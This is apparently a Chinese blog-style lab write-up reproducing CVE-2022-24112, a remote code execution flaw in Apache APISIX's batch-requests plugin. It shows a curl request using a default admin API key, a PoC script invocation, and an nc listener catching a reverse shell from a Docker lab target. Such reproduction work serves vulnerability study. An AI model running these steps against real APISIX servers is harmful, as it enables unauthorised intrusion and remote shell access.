CVE-2022-24112
漏洞原理
Apache Apisix是美国阿帕奇(Apache)基金会的一个云原生的微服务API网关服务。该软件基于 OpenResty 和 etcd 来实现,具备动态路由和插件热加载,适合微服务体系下的 API 管理。
Apache APISIX中存在远程代码执行漏洞,该漏洞源于产品的batch-requests插件未对用户的批处理请求进行有效限制。攻击者可通过该漏洞绕过Admin API的IP限制,容易导致远程代码执行。
影响版本
Apache APISIX >=2.11.0,<2.12.1
Apache APISIX <2.10.4
环境搭建
本次环境使用docker搭建环境进行复现
漏洞环境:cve-2022-24112
启动环境后访问9000端口可以进入登录页面,可以curl一下发现漏洞确实存在
1
2
3
4
5
6
7
8
9
10
11
12
13
| curl 'http://192.168.244.128:9080/apisix/admin/routes?api_key=edd1c9f034335f136f87ad84b625c8f1' -i
HTTP/1.1 200 OK
Date: Wed, 04 Sep 2024 02:06:44 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Server: APISIX/2.12.0
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
Access-Control-Max-Age: 3600
{"action":"get","node":{"dir":true,"key":"\/apisix\/routes","nodes":{}},"count":0}
|
使用poc进行漏洞利用
1
| python3 poc.py http://192.168.244.128:9080/ 172.21.79.212 4444
|
反弹shell
1
2
3
4
5
6
7
| nc -lvnp 4444
listening on [any] 4444 ...
connect to [172.21.79.212] from (UNKNOWN) [172.21.64.1] 60690
id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
whoami
nobody
|
还可以用在线靶场春秋云境